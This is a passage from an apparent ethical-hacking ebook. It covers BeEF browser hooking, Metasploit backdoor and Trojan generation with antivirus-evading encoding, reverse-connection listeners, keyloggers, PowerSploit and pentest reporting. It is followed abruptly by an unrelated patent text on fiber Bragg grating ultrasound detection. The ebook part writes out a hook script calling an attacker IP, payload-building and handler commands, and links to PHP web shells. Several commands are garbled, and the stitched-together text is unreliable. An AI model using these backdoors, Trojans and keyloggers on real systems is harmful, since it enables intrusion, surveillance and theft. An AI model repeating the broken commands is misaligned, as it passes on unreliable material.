BeEF is a JavaScript hook file hosted on the BeEF server that you can download to and run on the target browser. To use the BeEF exploit a browser, include the javascript hook on the page that will load on the client side. There are several ways to load the hook.js file on the client browser but the easiest is by loading the hook.js script. The code to enter on the browser will look like this:
<script src=”http://192.168.71.145:3000/hook.js” type=”text/javascript”></script>
This will allow you to remotely issue additional commands and even run independent modules against the target host.
In a real world test of the Browser Exploitation Framework, you could also inject the script on a web page as normal traffic via a compromised server to execute a man-in-the-middle attack.
You can also use these features of BeEF during reconnaissance and information gathering phases of hacking to collect personal information about users, email addresses and target computer information. BeEF offers 5 basic functions that a hacker can use to manipulate a hooked browser: Details, Commands, Logs, XssRays, and Rider options.
When an online browser is hooked, go to the BeEF panel Details section to view the IP address, operating system type and version, installed plugins, and even location.
Next, click on “Owned” IP addresses to run commands remotely then choose the module you wish to execute on the right pane. Finally click on “Execute”.
If you do not have a library of libraries to execute, Google can help you find what other people are sharing.
# 7. Phase 4: Maintaining Access
Exploiting a network system, a networking device, or a computer system can be referred to as a successful hack; however, penetration testing is not complete unless you can put in place ways to enable easier access into the compromised system.
There are many postexploitation techniques to ensure that you retain access to a successfully hacked host for future exploitation without going through the exhausting and time-consuming attacks each time. Maintaining access is considered a form of art that hackers find almost as taunting as gaining the initial access into a vulnerable computer system.
## 7.1 Using malware maintain access to a compromised system
In this chapter, we will highlight a few practical concepts and tactics that a beginner should know about and can use in practical hacking situations.
Malware, or malicious software, is a name that covers scripts and program codes including Trojans, viruses, keyloggers, worms, rootkits, bots and botnets and even spyware. Malware can be used in pentesting to keep tabs on an already-compromised system and provide reports about the system and users at an executive level using a separate program that runs on the host.
In this book, we will discover how we can use backdoors, Trojans, keyloggers, and listeners to maintain access to a system.
## 7.2 Backdoor with Metasploit
A backdoor is a necessary tool for a penetration testing hacker. It is typically a script that runs like a Trojan horse or even contained within one. In this section, we will look at how to create a backdoor using Metasploit and run it as a completely separate program on the host or attach it to a cryptosystem. You can also keep a backdoor script running on a system embedded as a rootkit or entwined within an authentication algorithm as a piece of program code.
Step 1: By this point, you should be used to the powerful Metasploit GUI and can navigate around the tool’s core functionality. On the command line, use the msfpayload command to generate binaries that can be run on Linux and Windows systems and even web applications.
| |
| --- |
| ~# msfpayload /meterpreter/open_tcp S |
The msfpayload may be piped through the msfencode command to encode the binaries created. This is done to minimize the chances of being detected by an antivirus system.
To view a listing of current available payloads, use the msfpayload -l command on the Terminal. You can create your own backdoors to be piped by the msfpayload tool in any of the following languages: C, C-Sharp, Perl, Ruby, JavaScript, VBA, and Python. If you have ready made backdoor files in the formats DLL, exe, or raw, you can also deploy with Metasploit through msfpayload.
| |
| --- |
| ~# msfpayload c:/Windows/meterpreter/open_tcp LHOST 11 {MY_IP} LPORT 7 {PORT} X . /root/backdoors/myunencoded_payload.exe |
This command generates an executable binary file called myunencoded_payload.exe that will be deployed on a Widows system using the meterpreter in Metasploit.
The command to use to create an encoded payload in the exe format would look like this:
| |
| --- |
| ~# msfpayload c:/Windows/meterpreter/open_tcp LHOST 11 {MY_IP} LPORT 7 {PORT} R j msfencode -e x64/countdown -c 2 -t raw j msfencode x -t exe -e x64/encoded_open_tcp -c 3 -k -o /root/backdoors/myencoded-payload.exe |
The best way to learn how to write and deploy payloads using Metasploits is to actually do it. Many programmers have created excellent backdoor tools that they share freely on Github, StackOverflow, and other platforms.
Backdoors for Web Services
Finding a vulnerability and exploiting it on a web service is a great feat for a hacker. However, considering how dynamic the web is, there are powerful systems that watch out for both successful and failed penetration attempts. This means admins are constantly made aware of any new vulnerabilities in their security.
Good hackers deploy a backdoor the instant they penetrate security and access a computer system or web service. Here is a brief list of some backdoors that you can download and use for free to execute local commands or to interact with a compromised system.
1. Jackall — PHP backdoor shell (http://oco.cc)
2. C99 Shell — PHP backdoor shell (http://www.r57shell.net/)
3. C100 Shell — PHP backdoor shell (http://www.r57shell.net/)
4. XXS-Shell — ASP.net backdoor, also a zombie controller (http://www.portcullis-security.com/tools/free/XSSShell039.zip)
5. Weevley — PHP backdoor shell with a telnet-like console (http://epinna.github.com/Weevley/downloads/weevley-1.0.tar.zip)
## 7.3 Encoded Trojan Horse
A Trojan is a piece of malware that you can deploy onto a host to carry out overt functions that may include creating backdoors on to the system and running scripts. A Trojan can also be programmed to steal system and user information and to set up the host to be used to penetrate other connected systems.
A Trojan is not to be confused with a virus. A Trojan is typically a stand-alone program that does not replicate or spread. It does not inject itself into another program but it can conceal itself in the system without altering configurations or files.
Note that deploying a Trojan horse is much more difficult compared to setting up a backdoor in a system because system security services are fine-tuned to sniff them out. While practicing deploying trojans, you can use commands such as this to understand the process and to findout what the freely available trojans you can download on the internet do.
| |
| --- |
| ~# msfpayload C:/Windows/meterpreter/open_tcp {MY_IP} {PORT} R j msfencode -e x64/xx -c 2 -t raw j msfencode -x /media/ {EXTERNAL_USB_DRIVE}/yy839us73.exe -t exe -e x64/yy893us73 -c 3 -k -o /root/backdoors/trojan.exe |
When creating or choosing an existing Trojan, consider the encoding used to create it and test it before deployment. More importantly, the target system will always have active firewalls and other intrusion detection systems, the deployment will mostly be a trial and error experimentation process.
## 7.4 Spyware (Metasploit listener)
Metasploit comes with an easy to use yet very powerful feature: The listener.
The Trojan horse we created in the previous step attacks from the client side and communicates back with information and for further commands. To send further commands to the Trojan horse (or other backdoor), you need the listener service. TO start it, go to the Terminal and enter these commands:
| |
| --- |
| ~# msfconsole ~# use exploit/multi/handler |
You can then connect with the payload by setting the Payload location and filling in your IP and port number to listen.
| |
| --- |
| set PAYLOAD C:/Windows/meterpreter/open_tcp set LHOST {MY_IP} set LPORT {PORT} run |
When the ports are set right and the Metasploit tool is running, you can interact with the Trojan or backdoor you deployed and even program it with triggers and alerts.
## 7.5 Keylogger
Keylogging is the process of capturing key strokes from a user logged in to a compromised system and send the information back to you. A simple search on the internet would show you just how vast the number of books and documentations about keyloggers have been written over the years. This shows just how popular (and effective) the tool is.
As a security tester, you will learn to depend on the keylogger to capture information on a system you have already compromised. This tool will send back vital information such as private emails and security change logs. Note that any information captured using the keylogger during security testing must be kept private under strict supervision and destroyed after engagement.
Their is a wide variety of keylogging tools you can download and use for free. Some are stealthier than others and they come with different added functionality and reporting features.
Metasploit comes with the keyscan tool within the meterpreter that you can use to start and monitor sessions with the victim computer. Keyscan commands are pretty straightforward:
| |
| --- |
| ~# keyscan_start ~# keyscan_dump ~# keyscan_dump (repeat as necessary) ~# keyscan_stop |
Find other popular (some illegal to use) keylogging tools on the internet and discover how they work, and in particular, how they evade detection and report back the user keystrokes on the compromised system. You will be surprised to see how powerful such a small software can be especially in social engineering during reconnaissance and scanning phases.
## 7.6 Remote Communications
Besides the tools we have discussed so far, there are remote communication techniques that a hacker can use to maintain access to a compromised computer or network. The most popular include point-to-point tunneling protocols, remote desktop authentication, and setting up VPN.
Powersploit
Powersploit is a tool that enables a hacker to interact with a Widows machine after penetrating its defenses. It installs and takes control of PowerShell in the victim computer, enabling you to send commands to the host directly from your terminal.
Powersploit comes with Kali Linux. To access and use it, enter the following command on your terminal:
| |
| --- |
| ~# cd /usr/share/powersploit/ |
You can enter the parameter “ls” to view a list of all the tools that come with powersploit that you can download on to the victim machine. Most of them have self-explanatory names such as code execution, PETools, reconnaissance, script modification, and antivirus bypass.
You can download any of these tools on to the victim computer by associating the powersploit session with a web server with all the tools. You can access the powersploit dashboard using the address http://localhost:8000/then type h when the page loads.
Setting up a remote communication channel is a great way to maintain exploit sessions, set up backdoors, and control the hacked system. If you persist long enough to become an advanced hacking learner, you will learn how to use covert channels and encryption to evade intrusion detection systems and exploit a system without the administrator realizing you are there.
# 8. Phase 5: Reporting
One thing that separates an ethical hacker from a blackhat hacker is that the former completes a penetration test with a full report for filing or to present to the technical staff or management of the client organization. In some cases, you may just want to document how you carry out a hack, vulnerabilities discovered, or effective exploits implemented.
Having technical expertise is important when carrying out a penetration test from the reconnaissance phase through to maintaining access, but you still need to show the tasks involved and events recorded to the non-techie management. This means the report you create must include the information that the client wants to see and a different documentation of the technical details uncovered that must be corrected.
Even in this phase, Kali Linux comes with great tools that really simplify the tough parts of creating a report. Browse the tools under “Reporting Tools” in the “Applications” menu and test out each to see what features it offers and whether it is suitable for your needs. In this book, we will look at how Dradis and Metagoofil can be used in generating a hack report.
## 8.1 Structure of a pentest report
A typical penetration testing report is split into several categories that we will look at briefly:
Executive summary
The executive summary section of the report is written last and highlights the test event as well as provide a general overview of the penetration test assessment. This section indicates the location of the test event, the type of hack, the composition of the test team, and a brief explanation of the security system and potential vulnerabilities of the system.
If you have pie charts and graphs to show the severity of the security flaws or the effectiveness of the exploit tools used, this is where you will put them. The section should however be short and concise--no more than three paragraphs long at the beginning of the report.
Engagement procedure
The engagement procedure is important in a pentest report because it defines the limits of engagements and processes and what is expected of the test. This may include defining the types of tests conducted, the depth of reconnaissance and scanning, and whether social engineering is a part of the data collection process.
Did you try denial of service attacks or just injected a packet into the http stream? Did the hack involve physical tampering of the server or was everything carried out remotely? Are any vulnerabilities found in the system common and could they have been exploited by other hackers in the past? This is where to indicate it.
Target architecture and composition
The target architecture and system composition section of the report is optional but it is important if you wish to go into detail to describe the information gathered about the target computer system or network and the target environment. Drawing up a rough plan of the system architecture and file structure or site map, open ports, services offered, identifiable hardware platforms, and list of users.
It is advisable that you make this stage of creating the report a part of the reconnaissance phase so that you can gather and document the information you will need for the scanning and exploitation phases while making it easy to create a report in the last report generation phase.
Findings
Your clients expect when you find or do not find any exploitable vulnerabilities in their system, that you will document the results along with the details of each vulnerability. It is important that you associate each weakness discovered with a hardware or software part of the system to make it easier for the client to understand it and the severity of the vulnerability.
If possible, link the discovered vulnerabilities to governance or regulatory requirements as well as the consequences (both to the system and the organization) of not fixing the gaping holes immediately. This will help non-technical and administrative members of the hacking team to make the needed corrections to the system and figure out how serious any prior penetrations could be.
Recommended actions
In this section, you recommend what actions the client or the organization takes for each actionable weakness or vulnerability in the system discovered and documented in the Findings section.
The recommendations should define the technical aspects of the problem as well as explain how the fix will rectify the situation. It should, in a generic language, explain to the system owner (the client) that the correction decision and choice of fix must come from them but it must be decisive and permanent. In some cases, recommendations are basically a reminder for the administration to enforce rules already laid down e.g. enforcing a strong user password policy and implementing an encrypted network storage system.
Conclusion
The conclusion part of the report basically summarizes the findings and recommendations in a few brief statements. The conclusion section is the best place to emphasize the importance of applying recommended actions and tips on how to look out for malicious attacks. Mention any matters that require extra attention to prompt the client to deal with those issues first.
Appendices
Finally, your report should include a section to explain and detail all other information that is necessary for filing but is not required in the main body of the report. This information may include raw test data, definitions of terms and acronyms used, links to further reading and test tools downloads, and the biography of the professional tester. You will also include reports generated by reporting tools such as Dradis and Metagoofil in this section.
## 8.2 Presentation and evidence storage
As a whitehat hacker doing penetration testing on a professional (or voluntary) capacity, you may find it necessary to present your pentest outcomes in a formal or semi-formal environment. This may include a slideshow of the actions you took and graphical demonstration of the charts and other visual media in your report.
In any case, when making a presentation, avoid making personal attacks against the system or network administrators, engineers, project management team members, or the administration members who may have contributed to the deterioration of the system or network security. Your mission should be to lay bare the facts you have unearthed in a manner that is devoid of emotion or accusation. Define the system’s shortcomings with honesty and address the need to fix the issues in the best way you see fit.
Some organizations insist that the report, along with all the evidence files and scripts, be stored in electronic formats for future reference. Special care must be taken when this is the case. At minimum, you should protect sensitive information with a strong encryption and possibly password. It is uncommon to store such files in plain folders, whether online or offline, because they need more protection than files currently in use.
If the client wants the files, logs, and other data deleted, you should assess your legal standing and be sure that no repercussion will befall you based on the errors or omissions not covered by the pentest. Make sure that the deletion of the data is acceptable from a legal point of view before wiping them completely, including backup copies on your systems. In such cases, the client may insist on a two-person integrity where a second person verifies that the data has indeed been completely erased from storage.
## 8.3 Dradis reporting tool
When the penetration test is done and you are making a report for the client, you need a tool like Dradis to share the results produced, track your work, and even publish your findings. Dradis is included with Kali Linux and you can start it by clicking on its shortcut under Applications > Reporting tools > dradis.
You can also start Dradis on the command line using the command:
| |
| --- |
| ~# service dradis start |
You can access the dashboard by typing the URL https://localhost:3004. You will be prompted to set up a password the first time and after logging in, you will be presented with a screen to import or export reports. You can import reports from other apps such as Nessus, NMAP, NEXPOSE, and even Metasploit.
The upload manager will help you refine the type of file you wish to import. For instance, when you choose to upload a Nessus scan file, it will present you with a list of scan results to choose one based on the folder it is stored in, the IP and port details of the host and services scanned. A typical import window looks like this:
You can make advancements, improvements, and modifications on a report before exporting in a format most compatible with your report presentation.
## 8.4 Metagoofil reporting tool
Metagoofil can carry out a search on Google to identify, find, and download the documents whose metadata you need for your report. It extracts this information from documents in the public domain and those shared by companies, individuals, and anonymously.
To start Metagoofil, enter the following command on the Terminal:
| |
| --- |
| ~# usr/share/metagoofil/ |
To begin searching, use the command:
| |
| --- |
| ~# python metagoofil.py |
There are many flags you can use to refine your search. Some of the top commands you should know about include:
–d (specify domain name to search)
–t (specify filetype to download e.g. docx, pdf, html etc)
–l (limit search results e.g. To 10, 50, or 100)
–n (limit the number of files to download)
–o (Specify the location to save the downloaded files)
–f (output the file)
# 9. Conclusion
Unless you have figured out how to download information from the internet or a hardware device directly into your brain and instantly convert it to a skill,you will never become a proficient hacker overnight. This book has adopted the most practical approach to learning and practicing to be a good hacker: Through penetration testing.
In the job market, pentesters or penetration testers, are professional ethical hackers who get paid handsomely by corporations, organizations, and even individuals to test their preparedness from the inevitable cyberattacks. By learning the formal approach to hacking, you have placed yourself in the right position to take advantage of all the benefits that computer security experts enjoy.
What you have learned in this eBook is just a tip of the iceberg when it comes to hacking. As evidenced by the number of tools that come with Kali Linux alone, there are thousands of possible hacking skills and steps you could learn with time. What is most important at this point is to focus on progress, not perfection. This means learn one thing, practice it until you are proficient, then move on to the next difficulty stage and start over again.
Considering that penetration testing is a process, methodology, and a collection of procedures that professionals use to circumvent computer and information security measures in place, it is only natural that it is a preserve for tech-savvy enthusiasts who are willing to go the extra mile to learn and put their knowledge in practice.
At this level, no one will pay you to find holes in their security system, therefore, go online, join other learners to learn from them, and practice your skills on dummy servers and computers. Within no time, you will be good enough to launch full-scale fully researched penetration testing attacks on a fully-fledged computer or network system.
As a parting note, always remember: You are a whitehat, not a blackhat; do not carry out attacks on computers or network systems you do not have permission to penetrate to avoid getting into trouble with the law.
## Table of Contents
* Legal Disclaimer:
* Your feedback
* 1. Introduction to Whitehat Hacking
+ 1.1 About The Code Academy
+ 1.2 What is Kali Linux?
+ 1.3 Why Kali Linux?
+ 1.4 How you should get started
* 2. Setting up a Wireless Lab
+ 2.1 Hardware and Software Requirements
+ 2.2 Installing Kali Linux
+ 2.3 Setting up the access point
* 3. The Penetration Testing Life Cycle
+ 3.1 Introduction to the Penetration Life cycle
+ 3.2 Phase 1: Reconnaissance
+ 3.3 Phase 2: Scanning
+ 3.4 Phase 3: Exploitation
+ 3.5 Phase 4: Escalating privileges and maintaining access
+ 3.6 Phase 5: Reporting
+ Summary
* 4. Phase 1: Reconnaissance (2500)
+ 4.1 theHarvester
+ 4.2 Googling, doxing, and using Metagoofil to build a target list
+ 4.3 Gathering information with DMitry (Deepmagic information gathering tool)
+ 4.4 Other notable information Gathering Tools in Kali Linux
+ 4.5 Summary
* 5. Phase 2: Scanning with Kali Linux Tools
+ 5.1 NMAP
+ 5.2 Nessus
+ 5.3 Metasploit
* 6. Phase 3: Exploitation
+ 6.1 Attack Vectors and Attack Types
+ 6.2 Exploiting Vulnerabilities with Metasploit
+ 6.3 Launching an attack
+ 6.4 Shell Management with Meterpreter
+ 6.5 Web Server and Application Exploitation
+ 6.6 Exploiting Web Servers with Nikto
+ 6.7 Exploiting a browser vulnerability with BeEF
* 7. Phase 4: Maintaining Access
+ 7.1 Using malware maintain access to a compromised system
+ 7.2 Backdoor with Metasploit
+ 7.3 Encoded Trojan Horse
+ 7.4 Spyware (Metasploit listener)
+ 7.5 Keylogger
+ 7.6 Remote Communications
* 8. Phase 5: Reporting
+ 8.1 Structure of a pentest report
+ 8.2 Presentation and evidence storage
+ 8.3 Dradis reporting tool
+ 8.4 Metagoofil reporting tool
* 9. Conclusion | |
BACKGROUND OF THE INVENTION
1. Field of the Invention
2. Background Art
SUMMARY OF THE INVENTION
Effects of the Invention
BRIEF DESCRIPTION OF THE DRAWINGS
DESCRIPTION OF PREFERRED EMBODIMENTS OF THE INVENTION
<First Embodiment>
<Second Embodiment>
<Regarding the FBG Reflection Characteristics>
<Other Embodiments>
<Effects of the Embodiments>
The present invention relates to an AE/ultrasound detection system. For example, it relates to a technique for detecting AE/ultrasound with the use of an FBG sensor, and to a system in which such technique is applied for evaluating the soundness of a structure.
In recent years, for the purpose of improving the reliability of a structure, it has been expected to establish a soundness evaluation apparatus. When the soundness of a structure is evaluated, it is very important to measure strain and to detect defection such as cracking. Strain has been often measured with the use of a resistive strain gauge utilizing change in electrical resistance associated with deformation of metal. Further, as a method for detecting defection such as cracking, the detection of elastic-wave emission (AE: acoustic emission) associated with occurrence of defection and a nondestructive inspection utilizing ultrasound are conducted.
Piezoelectric elements have been widely used as AE detection sensors and ultrasound detection sensors in a nondestructive inspection using ultrasound. However, such AE/ultrasound measurement using piezoelectric elements involves the following problems. Namely, since piezoelectric elements are influenced by electromagnetic interference, the AE/ultrasound measurement cannot be conducted in the atmosphere of electromagnetic waves. Also, since piezoelectric elements have narrowband response frequency characteristics, it is necessary to change the kind of piezoelectric elements in accordance with the frequency band of the AE/ultrasound to be detected.
2005-326326 A
2005-009937 A
In recent years, in order to solve the above problems of the AE/ultrasound detection using piezoelectric elements, AE/ultrasound detection using an FBG (Fiber Bragg Grating) sensor, a kind of optical fiber sensor, (which will be occasionally referred to simply as an "FBG" hereafter in the specification) has drawn attention. Conventionally-proposed AE/ultrasound detection systems using the FBG are divided roughly into two kinds, depending on the light source used. One kind is a system using a laser light source, as disclosed in JP Patent Publication (Kokai) No. . In this system, laser light whose oscillation wavelength is set at a wavelength at which the reflectance of the FBG is decreased by half is caused to enter the FBG. Upon entry of the light, since the intensity of the light reflected from the FBG varies depending on the AE/ultrasound received by the FBG, the AE/ultrasound can be detected. The other type is a system using a broadband light source, as disclosed in JP Patent Publication (Kokai) No. . In this system, broadband light including a Bragg wavelength, the central reflection wavelength of the FBG, is caused to enter the FBG, and the reflected light is transmitted to an optical filter having the transmission wavelength band approximately equal to the reflection wavelength band of the FBG. At this point, a portion of the transmission wavelength region of the optical filter needs to overlap the reflection wavelength region of the FBG. By utilizing such phenomenon; that is, the transmitted-light intensity or the reflected-light intensity of the optical filter changes depending on the AE/ultrasound received by the FBG, the AE/ultrasound can be detected.
However, the Bragg wavelength of the FBG fluctuates depending on the temperature and strain received by the FBG. For example, in the case of a FBG having a Bragg wavelength of 1550 nm generally used for evaluating the soundness of a structure, the Bragg wavelength varies by 10 pm for a temperature of 1°C with respect to the reflection wavelength band from 200 pm to 2000 pm, and the bragg wavelength also varies by 1.2 pm per micro strain. Thus, when the FBG receives a large change in temperature and strain, based on the system using a laser light source, there are cases in which the laser oscillation wavelength does not fall within the reflection wavelength region of the FBG. Similarly, based on the system using a broadband light source, there is a situation in which the transmission wavelength region of the optical filter does not cross the reflection wavelength region of the FBG. In such cases, the AE/ultrasound received by the FBG cannot be detected. Thus, it is necessary to control the laser oscillation wavelength or the optical-filter transmission wavelength in accordance with the fluctuation of the Bragg wavelength of the FBG. However, when the Bragg wavelength of the FBG fluctuates at high speed, such control cannot follow the change of the Bragg wavelength, and it is therefore conceivable that the AE/ultrasound cannot be detected. Particularly, since the AE generated upon destruction of a material is a phenomenon caused along with a large change of strain, a large fluctuation of the Bragg wavelength is caused upon occurrence of the AE. Thus, it is conceivable that the AE detection is very difficult with convention measurement systems.
2003-169801 A
In order to overcome the disadvantage, JP Patent Publication (Kokai) No. discloses a technique in which two thermally-coupled Bragg gratings made of the same material are used, so that the ultrasound received by the Bragg gratings can always be detected. In this technique, the Bragg gratings of the sensor and the filter that are thermally-coupled are synchronized upon receiving a temperature change, and the Bragg wavelengths are thus fluctuated.
2003-169801 A
However, based on the ultrasound detection disclosed in JP Patent Publication (Kokai) No. , when the sensor portion receives strain change, there may be a situation where ultrasound cannot be detected since the Bragg wavelengths of the sensor portion and the filter do not fluctuate in synchronization with each other.
The present invention has been made in view of such circumstances, and therefore it provides a system always capable of detecting the AE/ultrasound received by the FBG, even when the Bragg wavelength of the FBG is fluctuated upon receiving a change in temperature or strain.
In order to solve the above problems, in the AE/ultrasound detection system according to the present invention, reflected light from the FBG is caused to enter a Fabry-Perot filter having an FSR equal to or greater than the reflection wavelength band of the FBG. A change of the intensity of the transmitted light from the filter corresponds to the AE/ultrasound received by the FBG.
Further, in the AE/ultrasound detection system, the reflected light from the FBG is caused to enter two Fabry-Perot filters, each FSR thereof being equal to or greater than the reflection wavelength band of the FBG and the transmittance peak wavelengths thereof differ by FSR/4. The transmitted-light intensity of each of the two Fabry-Perot filters is converted into a voltage signal, and the individual signals are then subjected to addition and subtraction processes. In this way, a signal having a large amplitude corresponding to the AE/ultrasound received by the FBG can be obtained. A signal having the larger amplitude of the two signals subjected to the addition and subtraction processes corresponds to the AE/ultrasound received by the FBG.
It is preferable that an apodized FBG whose reflection characteristics exhibit no side lobes be used as the FBG. Further, for the detection of the AE/ultrasound, it is desirable to use an FBG whose reflection characteristics are not saturated; that is, an FBG that does not have a flat reflectance-wavelength relationship in the wavelength range in which the reflectance of the FBG reaches maximum. An FBG having a triangular reflectance-wavelength relationship is ideal for the detection of the AE/ultrasound.
Namely, the AE/ultrasound detection system according to the present invention comprises: a broadband light source for emitting broadband-wavelength light; an FBG sensor that is attached to an object-to-be-inspected and that the broadband-wavelength light enters; a filter having periodic transmission characteristics so as to transmit part of the reflected light or transmitted light from the FBG sensor; and photoelectric conversion means for converting the intensity of the transmitted light from the filter into an electric signal. Further, the broadband light source emits broadband light including the Bragg wavelength of the FBG, and the filter has an FSR equal to or greater than the reflection wavelength band or transmission wavelength band of the FBG. Furthermore, it is preferable that the transmittance peak wavelength of the filter be equal to a wavelength at which the reflectance or transmittance of the FBG is decreased by half.
Further, the AE/ultrasound detection system according to the present invention comprises: a broadband light source for emitting broadband-wavelength light; an FBG sensor that is attached to an object-to-be-inspected and that the broadband-wavelength light enters; light dividing means that divides reflected light or transmitted light from the FBG sensor so as to produce a first reflected light or transmitted light and a second reflected light or transmitted light; a first filter having periodic transmission characteristics so as to transmit part of the first reflected light or transmitted light; a second filter having periodic transmission characteristics and having its transmittance peak wavelength separated from that of the first filter by FSR/4 so as to transmit part of the second reflected light or transmitted light; and photoelectric conversion means for converting the intensity of the transmitted light from each of the first and second filters into an electric signal. The system further comprises processing means for performing addition and subtraction processes on the electric signal that is obtained by the conversion means and that corresponds to the intensity of the transmitted light from each of the filters. In the system, it is preferable that the broadband light source emit broadband light including the Bragg wavelength of the FBG and that the first and second filters have an FSR equal to or greater than the reflection wavelength band or transmission wavelength band of the FBG.
Preferably, in the AE/ultrasound detection system according to the present invention, the characteristics of the reflected light or transmitted light from the FBG sensor show those of an FBG on which an apodization process has been performed, thereby exhibiting no side lobes, and the characteristics are not saturated in a wavelength region in which the reflectance reaches maximum.
Further, in the above system, it is preferable that the filter be a Fabry-Perot filter or an AWG filter.
Still further, the material monitoring apparatus of the present invention comprises any one of the above AE/ultrasound detection systems, and it finds microscopic material destruction by detecting acoustic emission generated upon destruction of a material.
Furthermore, the nondestructive inspection apparatus of the present invention comprises any one of the above AE/ultrasound detection systems, and it conducts nondestructive inspection on a material or a structure with the use of ultrasound.
The present invention will be clarified hereafter in more detail by way of the description of preferred embodiments and the attached drawings.
In accordance with the present invention, AE/ultrasound can be detected with the use of an FBG sensor even in a situation where temperature/strain fluctuates at high speed, and therefore, a highly-reliable structure soundness evaluation system utilizing the AE/ultrasound can be provided.
Fig. 1 schematically shows the structure of an AE/ultrasound detection system according to an embodiment of the present invention.
Fig. 2 schematically shows the structure of a system used in AE/ultrasound measurement experiment (1).
Fig. 3 shows optical characteristics of an FBG 12 and a Fabry-Perot filter.
Fig. 4 shows transmission characteristics of the Fabry-Perot filter.
Fig. 5 shows the relationship between the reflected-light intensity of the FBG and the transmitted-light intensity of the Fabry-Perot filter: Fig. 5(a) shows the relationship where a filter-transmittance peak wavelength matches a wavelength at which the reflectance of the FBG is decreased by half; Fig. 5(b) shows the relationship where the Bragg wavelength of the FBG is located in the middle of adjacent filter-transmittance peak wavelengths; and Fig. 5(c) shows the relationship where the Bragg wavelength of the FBG matches the filter-transmittance peak wavelength.
Fig. 6 shows ultrasound response signals when the relationship between the Bragg wavelength of the FBG and the filter-transmittance peak wavelength is changed.
Fig. 7 schematically shows the structure of an AE/ultrasound detection system according to a second embodiment of the present invention.
Fig. 8 schematically shows a system used in AE/ultrasound measurement experiment (2).
Fig. 9 shows the relationship between the transmittance peak wavelengths of two Fabry-Perot filters and the relationship between such relationship and the reflectance of the FBG.
Fig. 10 shows the influence on the intensity of a response amplitude due to the difference between the transmittance peak wavelength of a Fabry-Perot filter (1) 25 and the Bragg wavelength.
Fig. 11 shows response waveforms and a synthesized signal detected when a relative wavelength is -0.15 mm (-3FSR/8).
Fig. 12 shows the relationship between the reflected-light intensity of the FBG and the transmittance peak wavelengths of two filters: Fig. 12(a) shows the positional relationship between the reflected-light intensity distribution of the FBG and the transmittance peak wavelengths of the two filters when the relative wavelength is -3FSR/8; and Fig. 12(b) shows the positional relationship between the reflected-light intensity distribution of the FBG and the transmittance peak wavelengths of the two filters when the relative wavelength is -FSR/8.
Fig. 13 shows ideal reflection characteristics of the FBG for AE/ultrasound detection.
Fig. 14 shows a desirable shape of reflection characteristics and an undesirable shape of reflection characteristics for AE/ultrasound detection.
Fig. 15 schematically shows the structure of an AE/ultrasound detection system with the use of the transmitted light from the FBG.
Fig. 16 schematically shows the structure of an AE/ultrasound detection system with the use of AWGs having a number N of output terminals, instead of the Fabry-Perot filter.
Fig. 17 shows diagrams for explaining the relationship between the reflection wavelength band of the FBG and the FSR of the Fabry-Perot filter.
Embodiments of the present invention will be described hereafter with reference to the attached drawings.
Fig. 1 shows a basic structure of an AE/ultrasound detection system according to a first embodiment of the present invention. An AE/ultrasound detection system 1 shown in Fig. 1 adopts a structure in which a broadband light source and one Fabry-Perot filter are combined.
As shown in Fig. 1, the AE/ultrasound detection system 1 is used for evaluating the soundness of an object-to-be-inspected 13, and it comprises: a broadband light source 10; an optical circulator 11; an FBG 12 (having been subjected to an apodization process); a Fabry-Perot filter 14; a photoelectric converter 15; and a data acquisition unit 16.
Referring to Fig. 1, broadband light from the broadband light source 10 enters the FBG 12 via the optical circulator 11. The FBG refers to a sensor having a diffraction grating structure in which the refraction index of the core portion of an optical fiber is periodically changed. When light enters the FBG, a wavelength component referred to as a Bragg wavelength is reflected by the FBG and the remaining components are allowed to pass therethrough. A shift amount of this Bragg wavelength changes depending on strain or temperature. Further, the FBG 12 has been previously subjected to an apodization process, and therefore, the distribution curve of the light reflected thereby exhibits a Gaussian distribution.
The reflected light from the FBG 12 enters the Fabry-Perot filter 14 via the optical circulator 11. The Fabry-Perot filter 14 does not transmit all the light incident thereon but it transmits only the light having a predetermined wavelength. Next, the transmitted light is inputted to the photoelectric converter 15, which converts the light into an electrical output corresponding to the light intensity. The data acquisition unit 16 causes a display unit not shown in the figure to display or a recording device not shown in the figure to record the electrical output, as the AE/ultrasound detected by the FBG 12.
Next, an AE/ultrasound measurement experiment will be described so that the operation of the AE/ultrasound detection system 1 of the present embodiment will be understood more clearly. Fig. 2 shows a system for the experiment, and an ultrasound oscillator 17 and a uniaxial displacement stage 18 are provided in order to represent a pseudo strain placed on the object-to-be-inspected 13 when conducting the experiment. The other features are the same as those of Fig. 1.
Fig. 3 shows optical characteristics of the FBG 12 and the Fabry-Perot filter 14. Herein, since the FBG 12 has been subjected to an apodization process, the reflection characteristics thereof show no side lobes and the reflection wavelength band thereof is made 0.34 nm, as shown in the figure. Further, regarding the optical characteristics of the Fabry-Perot filter 14, the filter has a FSR of 0.4 nm, which is slightly broader than the reflection wavelength band of the optical characteristics of the FBG 12, and the full width at half maximum transmission is 40 pm. As shown in Fig. 4, the transmission characteristics of the Fabry-Perot filter 14 are characterized in that the transmission region thereof periodically appears for each FSR (Free Spectral Range) frequency. Note that it would be ideal if the reflection wavelength band of the FBG 12 and the FSR of the Fabry-Perot filter 14 were equal to each other. However, as long as the FSR is equal to or greater than the reflection wavelength band, the combination of the FBG 12 and the Fabry-Perot filter 14 functions as a sensor. Namely, as shown in Fig. 17, when the reflection wavelength band > the FSR (Fig. 17(a)), two or more filter transmission regions exist in the reflection wavelength band of the FBG 12. Under such condition, an output from the filter will be a response signal that does not correspond to the waveform of the ultrasound or AE signal received by the FBG 12. Thus, in this case, the combination of the FBG 12 and the filter 14 does not function as a sensor. In contrast, when the reflection wavelength ≦ the FSR (Fig. 17(b) and (c)), the filter outputs a response signal equal to the waveform of the ultrasound or AE signal received by the FBG 12, and thus the combination of the FBG 12 and the filter 14 functions as a sensor. Namely, when the reflection wavelength band < the FSR (Fig. 17(b)), the dead zone (the region in which sensor sensitivity is low) of the sensor output expands. In Fig. 17(b), when the reflection wavelength of the FBG 12 falls within the range indicated by the arrow, the sensor sensitivity is low, and when the reflection wavelength band = the FSR shown in Fig. 17(c), the dead zone of the sensor output is caused to be minimized.
i
-3dB
i
B
